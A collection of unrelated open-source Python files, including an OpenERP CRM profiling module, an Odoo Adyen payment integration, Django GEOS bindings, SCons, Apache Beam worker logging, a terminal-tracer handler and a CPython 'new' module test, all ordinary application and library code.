dest="locale", default=None,
help="locale to be used from month and weekday names"
)
parser.add_option(
"-e", "--encoding",
dest="encoding", default=None,
help="Encoding to use for output."
)
parser.add_option(
"-t", "--type",
dest="type", default="text",
choices=("text", "html"),
help="output type (text or html)"
)
(options, args) = parser.parse_args(args)
if options.locale and not options.encoding:
parser.error("if --locale is specified --encoding is required")
sys.exit(1)
locale = options.locale, options.encoding
if options.type == "html":
if options.locale:
cal = LocaleHTMLCalendar(locale=locale)
else:
cal = HTMLCalendar()
encoding = options.encoding
if encoding is None:
encoding = sys.getdefaultencoding()
optdict = dict(encoding=encoding, css=options.css)
write = sys.stdout.buffer.write
if len(args) == 1:
write(cal.formatyearpage(datetime.date.today().year, **optdict))
elif len(args) == 2:
write(cal.formatyearpage(int(args[1]), **optdict))
else:
parser.error("incorrect number of arguments")
sys.exit(1)
else:
if options.locale:
cal = LocaleTextCalendar(locale=locale)
else:
cal = TextCalendar()
optdict = dict(w=options.width, l=options.lines)
if len(args) != 3:
optdict["c"] = options.spacing
optdict["m"] = options.months
if len(args) == 1:
result = cal.formatyear(datetime.date.today().year, **optdict)
elif len(args) == 2:
result = cal.formatyear(int(args[1]), **optdict)
elif len(args) == 3:
result = cal.formatmonth(int(args[1]), int(args[2]), **optdict)
else:
parser.error("incorrect number of arguments")
sys.exit(1)
write = sys.stdout.write
if options.encoding:
result = result.encode(options.encoding)
write = sys.stdout.buffer.write
write(result)
if __name__ == "__main__":
main(sys.argv)
|
BorgERP/borg-erp-6of3 | refs/heads/master | addons/crm_profiling/crm_profiling.py | 9 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from osv import fields,osv
from osv import orm
from tools.translate import _
def _get_answers(cr, uid, ids):
"""
@param cr: the current row, from the database cursor,
@param uid: the current user’s ID for security checks,
@param ids: List of crm profiling’s IDs """
query = """
select distinct(answer)
from profile_question_yes_rel
where profile IN %s"""
cr.execute(query, (tuple(ids),))
ans_yes = [x[0] for x in cr.fetchall()]
query = """
select distinct(answer)
from profile_question_no_rel
where profile IN %s"""
cr.execute(query, (tuple(ids),))
ans_no = [x[0] for x in cr.fetchall()]
return [ans_yes, ans_no]
def _get_parents(cr, uid, ids):
"""
@param cr: the current row, from the database cursor,
@param uid: the current user’s ID for security checks,
@param ids: List of crm profiling’s IDs
@return: Get parents's Id """
ids_to_check = ids
cr.execute("""
select distinct(parent_id)
from crm_segmentation
where parent_id is not null
and id IN %s""",(tuple(ids),))
parent_ids = [x[0] for x in cr.fetchall()]
trigger = False
for x in parent_ids:
if x not in ids_to_check:
ids_to_check.append(x)
trigger = True
if trigger:
ids_to_check = _get_parents(cr, uid, ids_to_check)
return ids_to_check
def test_prof(cr, uid, seg_id, pid, answers_ids = []):
""" return True if the partner pid fetch the segmentation rule seg_id
@param cr: the current row, from the database cursor,
@param uid: the current user’s ID for security checks,
@param seg_id: Segmentaion's ID
@param pid: partner's ID
@param answers_ids: Answers's IDs
"""
ids_to_check = _get_parents(cr, uid, [seg_id])
[yes_answers, no_answers] = _get_answers(cr, uid, ids_to_check)
temp = True
for y_ans in yes_answers:
if y_ans not in answers_ids:
temp = False
break
if temp:
for ans in answers_ids:
if ans in no_answers:
temp = False
break
if temp:
return True
return False
def _recompute_categ(self, cr, uid, pid, answers_ids):
""" Recompute category
@param self: The object pointer
@param cr: the current row, from the database cursor,
@param uid: the current user’s ID for security checks,
@param pid: partner's ID
@param answers_ids: Answers's IDs
"""
ok = []
cr.execute('''
select r.category_id
from res_partner_category_rel r left join crm_segmentation s on (r.category_id = s.categ_id)
where r.partner_id = %s and (s.exclusif = false or s.exclusif is null)
''', (pid,))
for x in cr.fetchall():
ok.append(x[0])
query = '''
select id, categ_id
from crm_segmentation
where profiling_active = true'''
if ok != []:
query = query +''' and categ_id not in(%s)'''% ','.join([str(i) for i in ok ])
query = query + ''' order by id '''
cr.execute(query)
segm_cat_ids = cr.fetchall()
for (segm_id, cat_id) in segm_cat_ids:
if test_prof(cr, uid, segm_id, pid, answers_ids):
ok.append(cat_id)
return ok
class question(osv.osv):
""" Question """
_name="crm_profiling.question"
_description= "Question"
_columns={
'name': fields.char("Question",size=128, required=True),
'answers_ids': fields.one2many("crm_profiling.answer","question_id","Avalaible answers",),
}
question()
class questionnaire(osv.osv):
""" Questionnaire """
_name="crm_profiling.questionnaire"
_description= "Questionnaire"
_columns = {
'name': fields.char("Questionnaire",size=128, required=True),
'description':fields.text("Description", required=True),
'questions_ids': fields.many2many('crm_profiling.question','profile_questionnaire_quest_rel',\
'questionnaire', 'question', "Questions"),
}
questionnaire()
class answer(osv.osv):
_name="crm_profiling.answer"
_description="Answer"
_columns={
"name": fields.char("Answer",size=128, required=True),
"question_id": fields.many2one('crm_profiling.question',"Question"),
}
answer()
class partner(osv.osv):
_inherit="res.partner"
_columns={
"answers_ids": fields.many2many("crm_profiling.answer","partner_question_rel",\
"partner","answer","Answers"),
}
def _questionnaire_compute(self, cr, uid, answers, context=None):
"""
@param self: The object pointer
@param cr: the current row, from the database cursor,
@param uid: the current user’s ID for security checks,
@param data: Get Data
@param context: A standard dictionary for contextual values """
partner_id = context.get('active_id')
query = "select answer from partner_question_rel where partner=%s"
cr.execute(query, (partner_id,))
for x in cr.fetchall():
answers.append(x[0])
self.write(cr, uid, [partner_id], {'answers_ids': [[6, 0, answers]]}, context=context)
return {}
def write(self, cr, uid, ids, vals, context=None):
"""
@param self: The object pointer
@param cr: the current row, from the database cursor,
@param uid: the current user’s ID for security checks,
@param ids: List of crm profiling’s IDs
@param context: A standard dictionary for contextual values """
if 'answers_ids' in vals:
vals['category_id']=[[6, 0, _recompute_categ(self, cr, uid, ids[0], vals['answers_ids'][0][2])]]
return super(partner, self).write(cr, uid, ids, vals, context=context)
partner()
class crm_segmentation(osv.osv):
""" CRM Segmentation """
_inherit="crm.segmentation"
_columns={
"answer_yes": fields.many2many("crm_profiling.answer","profile_question_yes_rel",\
"profile","answer","Included Answers"),
"answer_no": fields.many2many("crm_profiling.answer","profile_question_no_rel",\
"profile","answer","Excluded Answers"),
'parent_id': fields.many2one('crm.segmentation', 'Parent Profile'),
'child_ids': fields.one2many('crm.segmentation', 'parent_id', 'Child Profiles'),
'profiling_active': fields.boolean('Use The Profiling Rules', help='Check\
this box if you want to use this tab as part of the \
segmentation rule. If not checked, the criteria beneath will be ignored')
}
_constraints = [
(osv.osv._check_recursion, 'Error ! You can not create recursive profiles.', ['parent_id'])
]
def process_continue(self, cr, uid, ids, start=False):
"""
@param self: The object pointer
@param cr: the current row, from the database cursor,
@param uid: the current user’s ID for security checks,
@param ids: List of crm segmentation’s IDs """
categs = self.read(cr,uid,ids,['categ_id','exclusif','partner_id', \
'sales_purchase_active', 'profiling_active'])
for categ in categs:
if start:
if categ['exclusif']:
cr.execute('delete from res_partner_category_rel where \
category_id=%s', (categ['categ_id'][0],))
id = categ['id']
cr.execute('select id from res_partner order by id ')
partners = [x[0] for x in cr.fetchall()]
if categ['sales_purchase_active']:
to_remove_list=[]
cr.execute('select id from crm_segmentation_line where segmentation_id=%s', (id,))
line_ids = [x[0] for x in cr.fetchall()]
for pid in partners:
if (not self.pool.get('crm.segmentation.line').test(cr, uid, line_ids, pid)):
to_remove_list.append(pid)
for pid in to_remove_list:
partners.remove(pid)
if categ['profiling_active']:
to_remove_list = []
for pid in partners:
cr.execute('select distinct(answer) from partner_question_rel where partner=%s',(pid,))
answers_ids = [x[0] for x in cr.fetchall()]
if (not test_prof(cr, uid, id, pid, answers_ids)):
to_remove_list.append(pid)
for pid in to_remove_list:
partners.remove(pid)
for partner_id in partners:
cr.execute('insert into res_partner_category_rel (category_id,partner_id) values (%s,%s)', (categ['categ_id'][0],partner_id))
self.write(cr, uid, [id], {'state':'not running', 'partner_id':0})
return True
crm_segmentation()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
rickhurst/Django-non-rel-blog | refs/heads/master | django/contrib/gis/geos/prototypes/topology.py | 311 | """
This module houses the GEOS ctypes prototype functions for the
topological operations on geometries.
"""
__all__ = ['geos_boundary', 'geos_buffer', 'geos_centroid', 'geos_convexhull',
'geos_difference', 'geos_envelope', 'geos_intersection',
'geos_linemerge', 'geos_pointonsurface', 'geos_preservesimplify',
'geos_simplify', 'geos_symdifference', 'geos_union', 'geos_relate']
from ctypes import c_char_p, c_double, c_int
from django.contrib.gis.geos.libgeos import GEOM_PTR, GEOS_PREPARE
from django.contrib.gis.geos.prototypes.errcheck import check_geom, check_string
from django.contrib.gis.geos.prototypes.geom import geos_char_p
from django.contrib.gis.geos.prototypes.threadsafe import GEOSFunc
def topology(func, *args):
"For GEOS unary topology functions."
argtypes = [GEOM_PTR]
if args: argtypes += args
func.argtypes = argtypes
func.restype = GEOM_PTR
func.errcheck = check_geom
return func
### Topology Routines ###
geos_boundary = topology(GEOSFunc('GEOSBoundary'))
geos_buffer = topology(GEOSFunc('GEOSBuffer'), c_double, c_int)
geos_centroid = topology(GEOSFunc('GEOSGetCentroid'))
geos_convexhull = topology(GEOSFunc('GEOSConvexHull'))
geos_difference = topology(GEOSFunc('GEOSDifference'), GEOM_PTR)
geos_envelope = topology(GEOSFunc('GEOSEnvelope'))
geos_intersection = topology(GEOSFunc('GEOSIntersection'), GEOM_PTR)
geos_linemerge = topology(GEOSFunc('GEOSLineMerge'))
geos_pointonsurface = topology(GEOSFunc('GEOSPointOnSurface'))
geos_preservesimplify = topology(GEOSFunc('GEOSTopologyPreserveSimplify'), c_double)
geos_simplify = topology(GEOSFunc('GEOSSimplify'), c_double)
geos_symdifference = topology(GEOSFunc('GEOSSymDifference'), GEOM_PTR)
geos_union = topology(GEOSFunc('GEOSUnion'), GEOM_PTR)
# GEOSRelate returns a string, not a geometry.
geos_relate = GEOSFunc('GEOSRelate')
geos_relate.argtypes = [GEOM_PTR, GEOM_PTR]
geos_relate.restype = geos_char_p
geos_relate.errcheck = check_string
# Routines only in GEOS 3.1+
if GEOS_PREPARE:
geos_cascaded_union = GEOSFunc('GEOSUnionCascaded')
geos_cascaded_union.argtypes = [GEOM_PTR]
geos_cascaded_union.restype = GEOM_PTR
__all__.append('geos_cascaded_union')
|
mjkoster/HypermediaToolkit | refs/heads/master | MachineHypermediaToolkit/server/coap/__init__.py | 12133432 | |
MatthewWilkes/django | refs/heads/master | tests/admin_scripts/custom_templates/project_template/project_name/__init__.py | 12133432 | |
looooo/pivy | refs/heads/master | scons/scons-local-1.2.0.d20090919/SCons/Platform/cygwin.py | 2 | """SCons.Platform.cygwin
Platform-specific initialization for Cygwin systems.
There normally shouldn't be any need to import this module directly. It
will usually be imported through the generic SCons.Platform.Platform()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Platform/cygwin.py 4369 2009/09/19 15:58:29 scons"
import posix
from SCons.Platform import TempFileMunge
def generate(env):
posix.generate(env)
env['PROGPREFIX'] = ''
env['PROGSUFFIX'] = '.exe'
env['SHLIBPREFIX'] = ''
env['SHLIBSUFFIX'] = '.dll'
env['LIBPREFIXES'] = [ '$LIBPREFIX', '$SHLIBPREFIX' ]
env['LIBSUFFIXES'] = [ '$LIBSUFFIX', '$SHLIBSUFFIX' ]
env['TEMPFILE'] = TempFileMunge
env['TEMPFILEPREFIX'] = '@'
env['MAXLINELENGTH'] = 2048
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
fuselock/odoo | refs/heads/8.0 | addons/gamification_sale_crm/__openerp__.py | 320 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013 OpenERP SA (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'CRM Gamification',
'version': '1.0',
'author': 'OpenERP SA',
'category': 'hidden',
'depends': ['gamification','sale_crm'],
'website' : 'https://www.odoo.com/page/gamification',
'description': """Example of goal definitions and challenges that can be used related to the usage of the CRM Sale module.""",
'data': ['sale_crm_goals.xml'],
'demo': ['sale_crm_goals_demo.xml'],
'auto_install': True,
}
|
sodexis/odoo | refs/heads/8.0 | addons/payment_adyen/models/adyen.py | 165 | # -*- coding: utf-'8' "-*-"
import base64
try:
import simplejson as json
except ImportError:
import json
from hashlib import sha1
import hmac
import logging
import urlparse
from openerp.addons.payment.models.payment_acquirer import ValidationError
from openerp.addons.payment_adyen.controllers.main import AdyenController
from openerp.osv import osv, fields
from openerp.tools import float_round
_logger = logging.getLogger(__name__)
class AcquirerAdyen(osv.Model):
_inherit = 'payment.acquirer'
def _get_adyen_urls(self, cr, uid, environment, context=None):
""" Adyen URLs
- yhpp: hosted payment page: pay.shtml for single, select.shtml for multiple
"""
return {
'adyen_form_url': 'https://%s.adyen.com/hpp/pay.shtml' % ('live' if environment == 'prod' else environment),
}
def _get_providers(self, cr, uid, context=None):
providers = super(AcquirerAdyen, self)._get_providers(cr, uid, context=context)
providers.append(['adyen', 'Adyen'])
return providers
_columns = {
'adyen_merchant_account': fields.char('Merchant Account', required_if_provider='adyen'),
'adyen_skin_code': fields.char('Skin Code', required_if_provider='adyen'),
'adyen_skin_hmac_key': fields.char('Skin HMAC Key', required_if_provider='adyen'),
}
def _adyen_generate_merchant_sig(self, acquirer, inout, values):
""" Generate the shasign for incoming or outgoing communications.
:param browse acquirer: the payment.acquirer browse record. It should
have a shakey in shaky out
:param string inout: 'in' (openerp contacting ogone) or 'out' (adyen
contacting openerp). In this last case only some
fields should be contained (see e-Commerce basic)
:param dict values: transaction values
:return string: shasign
"""
assert inout in ('in', 'out')
assert acquirer.provider == 'adyen'
if inout == 'in':
keys = "paymentAmount currencyCode shipBeforeDate merchantReference skinCode merchantAccount sessionValidity shopperEmail shopperReference recurringContract allowedMethods blockedMethods shopperStatement merchantReturnData billingAddressType deliveryAddressType offset".split()
else:
keys = "authResult pspReference merchantReference skinCode merchantReturnData".split()
def get_value(key):
if values.get(key):
return values[key]
return ''
sign = ''.join('%s' % get_value(k) for k in keys).encode('ascii')
key = acquirer.adyen_skin_hmac_key.encode('ascii')
return base64.b64encode(hmac.new(key, sign, sha1).digest())
def adyen_form_generate_values(self, cr, uid, id, partner_values, tx_values, context=None):
base_url = self.pool['ir.config_parameter'].get_param(cr, uid, 'web.base.url')
acquirer = self.browse(cr, uid, id, context=context)
# tmp
import datetime
from dateutil import relativedelta
tmp_date = datetime.date.today() + relativedelta.relativedelta(days=1)
adyen_tx_values = dict(tx_values)
adyen_tx_values.update({
'merchantReference': tx_values['reference'],
'paymentAmount': '%d' % int(float_round(tx_values['amount'], 2) * 100),
'currencyCode': tx_values['currency'] and tx_values['currency'].name or '',
'shipBeforeDate': tmp_date,
'skinCode': acquirer.adyen_skin_code,
'merchantAccount': acquirer.adyen_merchant_account,
'shopperLocale': partner_values['lang'],
'sessionValidity': tmp_date,
'resURL': '%s' % urlparse.urljoin(base_url, AdyenController._return_url),
})
if adyen_tx_values.get('return_url'):
adyen_tx_values['merchantReturnData'] = json.dumps({'return_url': '%s' % adyen_tx_values.pop('return_url')})
adyen_tx_values['merchantSig'] = self._adyen_generate_merchant_sig(acquirer, 'in', adyen_tx_values)
return partner_values, adyen_tx_values
def adyen_get_form_action_url(self, cr, uid, id, context=None):
acquirer = self.browse(cr, uid, id, context=context)
return self._get_adyen_urls(cr, uid, acquirer.environment, context=context)['adyen_form_url']
class TxAdyen(osv.Model):
_inherit = 'payment.transaction'
_columns = {
'adyen_psp_reference': fields.char('Adyen PSP Reference'),
}
# --------------------------------------------------
# FORM RELATED METHODS
# --------------------------------------------------
def _adyen_form_get_tx_from_data(self, cr, uid, data, context=None):
reference, pspReference = data.get('merchantReference'), data.get('pspReference')
if not reference or not pspReference:
error_msg = 'Adyen: received data with missing reference (%s) or missing pspReference (%s)' % (reference, pspReference)
_logger.error(error_msg)
raise ValidationError(error_msg)
# find tx -> @TDENOTE use pspReference ?
tx_ids = self.pool['payment.transaction'].search(cr, uid, [('reference', '=', reference)], context=context)
if not tx_ids or len(tx_ids) > 1:
error_msg = 'Adyen: received data for reference %s' % (reference)
if not tx_ids:
error_msg += '; no order found'
else:
error_msg += '; multiple order found'
_logger.error(error_msg)
raise ValidationError(error_msg)
tx = self.pool['payment.transaction'].browse(cr, uid, tx_ids[0], context=context)
# verify shasign
shasign_check = self.pool['payment.acquirer']._adyen_generate_merchant_sig(tx.acquirer_id, 'out', data)
if shasign_check != data.get('merchantSig'):
error_msg = 'Adyen: invalid merchantSig, received %s, computed %s' % (data.get('merchantSig'), shasign_check)
_logger.warning(error_msg)
raise ValidationError(error_msg)
return tx
def _adyen_form_get_invalid_parameters(self, cr, uid, tx, data, context=None):
invalid_parameters = []
# reference at acquirer: pspReference
if tx.acquirer_reference and data.get('pspReference') != tx.acquirer_reference:
invalid_parameters.append(('pspReference', data.get('pspReference'), tx.acquirer_reference))
# seller
if data.get('skinCode') != tx.acquirer_id.adyen_skin_code:
invalid_parameters.append(('skinCode', data.get('skinCode'), tx.acquirer_id.adyen_skin_code))
# result
if not data.get('authResult'):
invalid_parameters.append(('authResult', data.get('authResult'), 'something'))
return invalid_parameters
def _adyen_form_validate(self, cr, uid, tx, data, context=None):
status = data.get('authResult', 'PENDING')
if status == 'AUTHORISED':
tx.write({
'state': 'done',
'adyen_psp_reference': data.get('pspReference'),
# 'date_validate': data.get('payment_date', fields.datetime.now()),
# 'paypal_txn_type': data.get('express_checkout')
})
return True
elif status == 'PENDING':
tx.write({
'state': 'pending',
'adyen_psp_reference': data.get('pspReference'),
})
return True
else:
error = 'Adyen: feedback error'
_logger.info(error)
tx.write({
'state': 'error',
'state_message': error
})
return False
|
saitoha/trachet | refs/heads/master | trachet/output.py | 1 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# ***** BEGIN LICENSE BLOCK *****
# Copyright (C) 2012-2014 Hayaki Saito <user@zuse.jp>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# ***** END LICENSE BLOCK *****
from tffstub import tff
import constant
class OutputHandler(tff.DefaultHandler):
def __init__(self, controller, tracer):
self._tracer = tracer
self._controller = controller
def handle_csi(self, context, parameter, intermediate, final):
def action():
context.put(0x1b) # ESC
context.put(0x5b) # [
for c in parameter:
context.put(c)
for c in intermediate:
context.put(c)
context.put(final)
self._tracer.set_output()
self._tracer.handle_csi(context, parameter, intermediate, final)
return constant.SEQ_TYPE_CSI
self._controller.append(action)
return True # handled
def handle_esc(self, context, intermediate, final):
def action():
context.put(0x1b) # ESC
for c in intermediate:
context.put(c)
context.put(final)
self._tracer.set_output()
self._tracer.handle_esc(context, intermediate, final)
return constant.SEQ_TYPE_ESC
self._controller.append(action)
return True # handled
def handle_ss2(self, context, final):
def action():
context.put(0x1b) # ESC
context.put(0x4e) # N
context.put(final)
self._tracer.set_output()
self._tracer.handle_ss2(context, final)
return constant.SEQ_TYPE_SS2
self._controller.append(action)
return True # handled
def handle_ss3(self, context, final):
def action():
context.put(0x1b) # ESC
context.put(0x4f) # O
context.put(final)
self._tracer.set_output()
self._tracer.handle_ss3(context, final)
return constant.SEQ_TYPE_SS3
self._controller.append(action)
return True # handled
def handle_control_string(self, context, prefix, value):
def action():
context.put(0x1b) # ESC
context.put(prefix)
for c in value:
context.put(c)
context.put(0x1b) # ESC
context.put(0x5c) # \
self._tracer.set_output()
self._tracer.handle_control_string(context, prefix, value)
return constant.SEQ_TYPE_STR
self._controller.append(action)
return True
def handle_char(self, context, final):
def action():
context.put(final)
self._tracer.set_output()
self._tracer.handle_char(context, final)
return constant.SEQ_TYPE_CHAR
self._controller.append(action)
return True # handled
def handle_invalid(self, context, seq):
def action():
for c in seq:
context.put(c)
self._tracer.set_output()
self._tracer.handle_invalid(context, seq)
return constant.SEQ_TYPE_CHAR
self._controller.append(action)
return True # handled
def handle_resize(self, context, row, col):
self._tracer.handle_resize(context, row, col)
def handle_draw(self, context):
self._controller.tick()
self._tracer.handle_draw(context)
if __name__ == "__main__":
import doctest
doctest.testmod() |
rangadi/beam | refs/heads/master | sdks/python/apache_beam/runners/worker/logger.py | 6 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# cython: language_level=3
"""Python worker logging."""
from __future__ import absolute_import
import json
import logging
import threading
import traceback
from apache_beam.runners.worker import statesampler
# This module is experimental. No backwards-compatibility guarantees.
# Per-thread worker information. This is used only for logging to set
# context information that changes while work items get executed:
# work_item_id, step_name, stage_name.
class _PerThreadWorkerData(threading.local):
def __init__(self):
super(_PerThreadWorkerData, self).__init__()
# in the list, as going up and down all the way to zero incurs several
# reallocations.
self.stack = []
def get_data(self):
all_data = {}
for datum in self.stack:
all_data.update(datum)
return all_data
per_thread_worker_data = _PerThreadWorkerData()
class PerThreadLoggingContext(object):
"""A context manager to add per thread attributes."""
def __init__(self, **kwargs):
self.kwargs = kwargs
self.stack = per_thread_worker_data.stack
def __enter__(self):
self.enter()
def enter(self):
self.stack.append(self.kwargs)
def __exit__(self, exn_type, exn_value, exn_traceback):
self.exit()
def exit(self):
self.stack.pop()
class JsonLogFormatter(logging.Formatter):
"""A JSON formatter class as expected by the logging standard module."""
def __init__(self, job_id, worker_id):
super(JsonLogFormatter, self).__init__()
self.job_id = job_id
self.worker_id = worker_id
def format(self, record):
"""Returns a JSON string based on a LogRecord instance.
Args:
record: A LogRecord instance. See below for details.
Returns:
A JSON string representing the record.
A LogRecord instance has the following attributes and is used for
formatting the final message.
Attributes:
created: A double representing the timestamp for record creation
(e.g., 1438365207.624597). Note that the number contains also msecs and
microsecs information. Part of this is also available in the 'msecs'
attribute.
msecs: A double representing the msecs part of the record creation
(e.g., 624.5970726013184).
msg: Logging message containing formatting instructions or an arbitrary
object. This is the first argument of a log call.
args: A tuple containing the positional arguments for the logging call.
levelname: A string. Possible values are: INFO, WARNING, ERROR, etc.
exc_info: None or a 3-tuple with exception information as it is
returned by a call to sys.exc_info().
name: Logger's name. Most logging is done using the default root logger
and therefore the name will be 'root'.
filename: Basename of the file where logging occurred.
funcName: Name of the function where logging occurred.
process: The PID of the process running the worker.
thread: An id for the thread where the record was logged. This is not a
real TID (the one provided by OS) but rather the id (address) of a
Python thread object. Nevertheless having this value can allow to
filter log statement from only one specific thread.
"""
output = {}
output['timestamp'] = {
'seconds': int(record.created),
'nanos': int(record.msecs * 1000000)}
# ERROR. INFO, DEBUG log levels translate into the same for severity
# property. WARNING becomes WARN.
output['severity'] = (
record.levelname if record.levelname != 'WARNING' else 'WARN')
# msg could be an arbitrary object, convert it to a string first.
record_msg = str(record.msg)
# Prepare the actual message using the message formatting string and the
# positional arguments as they have been used in the log call.
if record.args:
try:
output['message'] = record_msg % record.args
except (TypeError, ValueError):
output['message'] = '%s with args (%s)' % (record_msg, record.args)
else:
output['message'] = record_msg
# The thread ID is logged as a combination of the process ID and thread ID
# since workers can run in multiple processes.
output['thread'] = '%s:%s' % (record.process, record.thread)
# job ID and worker ID. These do not change during the lifetime of a worker.
output['job'] = self.job_id
output['worker'] = self.worker_id
# Stage, step and work item ID come from thread local storage since they
# change with every new work item leased for execution. If there is no
# work item ID then we make sure the step is undefined too.
data = per_thread_worker_data.get_data()
if 'work_item_id' in data:
output['work'] = data['work_item_id']
tracker = statesampler.get_current_tracker()
if tracker:
output['stage'] = tracker.stage_name
if tracker.current_state() and tracker.current_state().name_context:
output['step'] = tracker.current_state().name_context.logging_name()
# All logging happens using the root logger. We will add the basename of the
# file and the function name where the logging happened to make it easier
# to identify who generated the record.
output['logger'] = '%s:%s:%s' % (
record.name, record.filename, record.funcName)
# Add exception information if any is available.
if record.exc_info:
output['exception'] = ''.join(
traceback.format_exception(*record.exc_info))
return json.dumps(output)
def initialize(job_id, worker_id, log_path):
"""Initialize root logger so that we log JSON to a file and text to stdout."""
file_handler = logging.FileHandler(log_path)
file_handler.setFormatter(JsonLogFormatter(job_id, worker_id))
logging.getLogger().addHandler(file_handler)
# Set default level to INFO to avoid logging various DEBUG level log calls
# sprinkled throughout the code.
logging.getLogger().setLevel(logging.INFO)
|
leafclick/intellij-community | refs/heads/master | python/testData/quickFixes/PyRemoveStatementQuickFixTest/only_after.py | 80 | class B(object):
def __init__(self): # error
pass
|
mancoast/CPythonPyc_test | refs/heads/master | cpython/251_test_new.py | 13 | from test.test_support import verbose, verify, TestFailed
import sys
import new
class Eggs:
def get_yolks(self):
return self.yolks
print 'new.module()'
m = new.module('Spam')
if verbose:
print m
m.Eggs = Eggs
sys.modules['Spam'] = m
import Spam
def get_more_yolks(self):
return self.yolks + 3
print 'new.classobj()'
C = new.classobj('Spam', (Spam.Eggs,), {'get_more_yolks': get_more_yolks})
if verbose:
print C
print 'new.instance()'
c = new.instance(C, {'yolks': 3})
if verbose:
print c
o = new.instance(C)
verify(o.__dict__ == {},
"new __dict__ should be empty")
del o
o = new.instance(C, None)
verify(o.__dict__ == {},
"new __dict__ should be empty")
del o
def break_yolks(self):
self.yolks = self.yolks - 2
print 'new.instancemethod()'
im = new.instancemethod(break_yolks, c, C)
if verbose:
print im
verify(c.get_yolks() == 3 and c.get_more_yolks() == 6,
'Broken call of hand-crafted class instance')
im()
verify(c.get_yolks() == 1 and c.get_more_yolks() == 4,
'Broken call of hand-crafted instance method')
im = new.instancemethod(break_yolks, c)
im()
verify(c.get_yolks() == -1)
try:
new.instancemethod(break_yolks, None)
except TypeError:
pass
else:
raise TestFailed, "dangerous instance method creation allowed"
# Verify that instancemethod() doesn't allow keyword args
try:
new.instancemethod(break_yolks, c, kw=1)
except TypeError:
pass
else:
raise TestFailed, "instancemethod shouldn't accept keyword args"
# It's unclear what the semantics should be for a code object compiled at
# module scope, but bound and run in a function. In CPython, `c' is global
# (by accident?) while in Jython, `c' is local. The intent of the test
# clearly is to make `c' global, so let's be explicit about it.
codestr = '''
global c
a = 1
b = 2
c = a + b
'''
ccode = compile(codestr, '<string>', 'exec')
# Jython doesn't have a __builtins__, so use a portable alternative
import __builtin__
g = {'c': 0, '__builtins__': __builtin__}
# this test could be more robust
print 'new.function()'
func = new.function(ccode, g)
if verbose:
print func
func()
verify(g['c'] == 3,
'Could not create a proper function object')
# test the various extended flavors of function.new
def f(x):
def g(y):
return x + y
return g
g = f(4)
new.function(f.func_code, {}, "blah")
g2 = new.function(g.func_code, {}, "blah", (2,), g.func_closure)
verify(g2() == 6)
g3 = new.function(g.func_code, {}, "blah", None, g.func_closure)
verify(g3(5) == 9)
def test_closure(func, closure, exc):
try:
new.function(func.func_code, {}, "", None, closure)
except exc:
pass
else:
print "corrupt closure accepted"
test_closure(g, None, TypeError) # invalid closure
test_closure(g, (1,), TypeError) # non-cell in closure
test_closure(g, (1, 1), ValueError) # closure is wrong size
test_closure(f, g.func_closure, ValueError) # no closure needed
print 'new.code()'
# bogus test of new.code()
# Note: Jython will never have new.code()
if hasattr(new, 'code'):
def f(a): pass
